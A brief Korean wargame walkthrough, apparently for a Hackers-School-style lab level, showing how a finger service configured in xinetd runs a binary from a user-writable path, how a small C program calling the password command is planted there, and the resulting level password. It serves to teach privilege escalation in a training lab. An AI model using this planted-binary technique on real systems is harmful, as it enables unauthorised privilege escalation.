Level5 Password is "what is your name?".
/etc/xinetd.d/ 로 이동해보자
backdoor 라는 파일이 있다 읽어보면
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
tmp로 이동해서 "my-pass"를 실행하는 코드를 만들어보자
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
system("my-pass");
return 0;
}
이제 실행되는 경로에 backdoor가 생성 되었다
finger service를 실행시켜보자
finger @localhost 라고 실행시켜야 한다
flag가 뜬다 Level5 Password is "what is your name?".
Study pwnable 09